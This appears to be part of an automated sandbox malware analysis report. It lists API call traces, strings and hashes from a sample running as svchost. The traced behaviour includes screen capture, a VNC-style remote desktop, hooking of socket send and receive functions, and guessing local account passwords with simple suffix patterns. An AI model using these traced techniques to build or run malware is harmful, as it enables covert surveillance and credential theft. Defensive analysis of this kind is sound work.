                                                                                                                                                                                                              • htons.WS2_32(00000000), ref: 026551A1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000C00), ref: 026551D1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 026551D4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000C00), ref: 026551E4
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 026551E7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$AllocFreeTableValidatememset$htonsinet_addr
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1718479325-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02655250
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 0265527C
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,0000001C,0000001C), ref: 026552A3
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000005), ref: 026552D4
                                                                                                                                                                                                              • strstr.MSVCRT ref: 026552FD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,Content-Length: ), ref: 02655315
                                                                                                                                                                                                              • StrToIntA.SHLWAPI(-00000010), ref: 02655323
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000004), ref: 02655355
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$Readmemcpystrstr
                                                                                                                                                                                                              • String ID: $Content-Length: $POST
                                                                                                                                                                                                              • API String ID: 2509092961-2076583852
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0264833C
                                                                                                                                                                                                              • GetThreadDesktop.USER32(00000000,?,?,02648212,00000000,00000000), ref: 02648343
                                                                                                                                                                                                              • SetThreadDesktop.USER32(00000000,?,?,02648212,00000000,00000000), ref: 0264834F
                                                                                                                                                                                                                • Part of subcall function 0264DA20: GetTickCount.KERNEL32 ref: 0264DA2D
                                                                                                                                                                                                                • Part of subcall function 0264DA20: HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 0264DA3E
                                                                                                                                                                                                                • Part of subcall function 0264DA20: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,0268F5A0), ref: 0264DA6A
                                                                                                                                                                                                                • Part of subcall function 0264DA20: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0264DA83
                                                                                                                                                                                                                • Part of subcall function 0264DA20: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,0268F54C), ref: 0264DAB0
                                                                                                                                                                                                                • Part of subcall function 0264DA20: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0264DAC3
                                                                                                                                                                                                                • Part of subcall function 0264DA20: CreateMutexA.KERNEL32(00000000,00000000,0268F670), ref: 0264DAE1
                                                                                                                                                                                                                • Part of subcall function 0264DA20: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 0264DAFF
                                                                                                                                                                                                                • Part of subcall function 0264DA20: GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?), ref: 0264DB20
                                                                                                                                                                                                                • Part of subcall function 0264DA20: SetNamedSecurityInfoA.ADVAPI32(0268F670,00000006,00000010,00000000,00000000,00000000,00000000), ref: 0264DB3D
                                                                                                                                                                                                                • Part of subcall function 0264DA20: LocalFree.KERNEL32(00000000), ref: 0264DB47
                                                                                                                                                                                                                • Part of subcall function 0264DC50: memset.MSVCRT ref: 0264DC69
                                                                                                                                                                                                                • Part of subcall function 0264DC50: GetVersionExA.KERNEL32(?,?,00000000,?), ref: 0264DC82
                                                                                                                                                                                                                • Part of subcall function 02669F50: malloc.MSVCRT ref: 02669F62
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,00000008), ref: 026483E7
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,00000005), ref: 026483F5
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(00000000,fuck), ref: 026483FF
                                                                                                                                                                                                                • Part of subcall function 02654F80: IsNetworkAlive.SENSAPI(02646E0D,00000000), ref: 02654F93
                                                                                                                                                                                                                • Part of subcall function 02654F80: IsUserAnAdmin.SHELL32 ref: 02654FA1
                                                                                                                                                                                                                • Part of subcall function 02654F80: DnsFlushResolverCache.DNSAPI ref: 02654FAB
                                                                                                                                                                                                                • Part of subcall function 02654F80: memset.MSVCRT ref: 02654FC8
                                                                                                                                                                                                                • Part of subcall function 02654F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,76F90F10), ref: 02654FE7
                                                                                                                                                                                                                • Part of subcall function 02654F80: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02655000
                                                                                                                                                                                                                • Part of subcall function 02654F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02655013
                                                                                                                                                                                                                • Part of subcall function 02654F80: memset.MSVCRT ref: 0265502C
                                                                                                                                                                                                                • Part of subcall function 02654F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,76F90F10), ref: 02655045
                                                                                                                                                                                                                • Part of subcall function 02654F80: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02655058
                                                                                                                                                                                                                • Part of subcall function 02654F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02655065
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000), ref: 026484A2
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 026484B1
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 026484E0
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 026484EF
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 026484FD
                                                                                                                                                                                                              • SetEvent.KERNEL32(00000000), ref: 02648506
                                                                                                                                                                                                              • Sleep.KERNEL32(00002710,?,00000000), ref: 0264854C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateFileObjectSecuritySingleWait$DescriptorHeapThreadmemset$AllocCheckConnectionDesktopInternetMappingMutexViewlstrcpyn$AdminAliveCacheConvertCountCurrentEventFlushFreeInfoLocalNamedNetworkReleaseResolverSaclSleepStringTickUserVersionlstrcpymalloc
                                                                                                                                                                                                              • String ID: SYSTEM!141700!EEA00FA4$fuck
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269CF94), ref: 02663367
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 026633A9
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 026633B5
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 026633B9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 026633CA
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 026633D1
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02663402
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02663408
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0266340C
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0266341D
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02663424
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02663452
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 02663468
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$scrs
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}), ref: 026631EC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 026631FD
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02663211
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0266321F
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02663080,00000000,00000000,00000000), ref: 02663234
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40), ref: 02663245
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0266324A
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0266325E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0266326C
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A277), ref: 02663277
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,8A99A277,RFK), ref: 02663291
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 0266329A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                              • String ID: 8A99A277$Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}$RFK
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetAncestor.USER32(00000000,00000002,00000080,?,00000000), ref: 0264A25E
                                                                                                                                                                                                                • Part of subcall function 0264E250: GetWindowLongA.USER32(0264CE3A,000000F0), ref: 0264E26B
                                                                                                                                                                                                                • Part of subcall function 0264E250: GetLastActivePopup.USER32(0264CE3A), ref: 0264E279
                                                                                                                                                                                                                • Part of subcall function 0264E250: GetWindow.USER32(00000000,00000005), ref: 0264E293
                                                                                                                                                                                                                • Part of subcall function 0264E250: GetWindow.USER32(00000000), ref: 0264E296
                                                                                                                                                                                                                • Part of subcall function 0264E250: GetWindowInfo.USER32(00000000,?), ref: 0264E2AC
                                                                                                                                                                                                                • Part of subcall function 0264E250: GetWindow.USER32(00000000,00000004), ref: 0264E2B5
                                                                                                                                                                                                                • Part of subcall function 0264E250: GetWindow.USER32(00000000,00000003), ref: 0264E2EE
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 0264A29F
                                                                                                                                                                                                              • GetAncestor.USER32(00000000,00000002,00000000), ref: 0264A325
                                                                                                                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000021,00000000,00000001,00000002,00000064,?), ref: 0264A34C
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000020,00000000,00000001), ref: 0264A391
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000000,00000000,00000001), ref: 0264A3E5
                                                                                                                                                                                                                • Part of subcall function 0264A100: GetTickCount.KERNEL32 ref: 0264A18A
                                                                                                                                                                                                                • Part of subcall function 0264A100: GetClassLongA.USER32(00000000,000000E6), ref: 0264A1DD
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000112,?,?), ref: 0264A44E
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,0000007B,00000000,?), ref: 0264A479
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,0000007B,00000000,00000000), ref: 0264A4F5
                                                                                                                                                                                                              • GetSystemMenu.USER32(00000000,00000000), ref: 0264A514
                                                                                                                                                                                                              • GetMenuItemInfoA.USER32(00000000,0000F060,00000000,0000004C), ref: 0264A538
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0264A5A3
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0264A5B6
                                                                                                                                                                                                              • PostMessageA.USER32(?,?,00000001,00000000), ref: 0264A5D9
                                                                                                                                                                                                              • PostMessageA.USER32(?,?,00000002,00000000), ref: 0264A5FB
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0264A633
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0264A65D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$Window$Post$ProcessThread$AncestorInfoLongMenuSend$ActiveClassCountItemLastPopupSystemTickTimeout
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 590198697-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,76A8DB30), ref: 00401EC6
                                                                                                                                                                                                              • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,?,?,?,00000000,76A8DB30), ref: 00401EE2
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00401F28
                                                                                                                                                                                                              • NetUserGetInfo.NETAPI32(00000000,00000000,00000001,?), ref: 00401F39
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 00401F5A
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 00401F65
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,76E95430,00000000,?), ref: 00401923
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 00401963
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                                • Part of subcall function 004018E0: CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00401FCA
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 0040200A
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00402046
                                                                                                                                                                                                              • SwitchToThread.KERNEL32(?,?,00404D80,?,?,?), ref: 0040208F
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 004020B5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$ByteCharFreeMultiWide$_snprintfmemset$AllocBufferValidate$CreateDisplayFileInfoInformationLogonModuleNameQuerySwitchThreadUserWith
                                                                                                                                                                                                              • String ID: %s1$%s12$%s123
                                                                                                                                                                                                              • API String ID: 1588441251-2882894844
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?,76F8F590,76F816B0,?), ref: 0264902F
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 02649037
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 02649048
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 02649059
                                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 02649070
                                                                                                                                                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 026490B2
                                                                                                                                                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 026490C2
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 026490C5
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 026490CE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02649129
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 02649142
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0264915F
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?), ref: 02649194
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocBitsCapsDesktopDeviceThread$BitmapCompatibleCreateDeleteFreeObjectRelease
                                                                                                                                                                                                              • String ID: (
                                                                                                                                                                                                              • API String ID: 188880187-3887548279
                                                                                                                                                                                                              • Opcode ID: 6f033259bec1d721f27cf586f28672d1e7ebc773574568dc25b41df3b28d97f1
                                                                                                                                                                                                              • Instruction ID: 62ec80fc5b7b51355cc3f66183affa737ebdb2193e03df1dc677ad985ef8b087
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f033259bec1d721f27cf586f28672d1e7ebc773574568dc25b41df3b28d97f1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 70416C71E81208AFDB10CFA8DC89BDE7BB8EB48710F545629E509E7380DB715850CBA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(advapi32.dll,00000000,00000000,76F8F550,76F8DF10,0265598B), ref: 02659831
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 02659843
                                                                                                                                                                                                                • Part of subcall function 0265A540: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,76F8F550,00000000,753CBD50,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A578
                                                                                                                                                                                                                • Part of subcall function 0265A540: memcpy.MSVCRT(?,?,00000000,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A5A0
                                                                                                                                                                                                                • Part of subcall function 0265A540: VirtualProtect.KERNEL32(00000000,?,00000040,026598DA,?,?,?,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A635
                                                                                                                                                                                                                • Part of subcall function 0265A540: VirtualProtect.KERNEL32(?,00000000,00000040,026598DA,?,?,?,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A64A
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02659862
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,send), ref: 02659870
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WSASend), ref: 0265988C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WSARecv), ref: 026598A8
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,recv), ref: 026598C4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$Virtual$LibraryLoadProtect$Allocmemcpy
                                                                                                                                                                                                              • String ID: CryptEncrypt$WSARecv$WSASend$advapi32.dll$recv$send$ws2_32.dll
                                                                                                                                                                                                              • API String ID: 1216545827-2206184491
                                                                                                                                                                                                              • Opcode ID: 49b597e96cc74a3e59da2e8561513c946c8d39cb0a0de329233d03f370f8d657
                                                                                                                                                                                                              • Instruction ID: 8e0a77833a2f1e09e674ecbad7baea901224f3afd59108929f1344e1d2b28a24
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49b597e96cc74a3e59da2e8561513c946c8d39cb0a0de329233d03f370f8d657
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD01D772783332B0FA2036B64D06F2B378D1F55F48F150A25BD02B6640EA9DE91148F9
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: malloc$inet_ntoa$closesocketfreegetpeernamesetsockopt
                                                                                                                                                                                                              • String ID: RFB 003.006
                                                                                                                                                                                                              • API String ID: 725816019-3790533501
                                                                                                                                                                                                              • Opcode ID: 7c3b7b7d4bcc110745480326afdc6a03088ce4ad0ea43cf39aaa8d8fe78d56c3
                                                                                                                                                                                                              • Instruction ID: 50fb9bfa41995819036920216f2500ddd35271a8f8cbf4269fc32cd40203a78a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c3b7b7d4bcc110745480326afdc6a03088ce4ad0ea43cf39aaa8d8fe78d56c3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ECC15EB0900640DFDB10CF29D888BA6BBE5FF88314F1586AADC49CF356D775A840CBA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
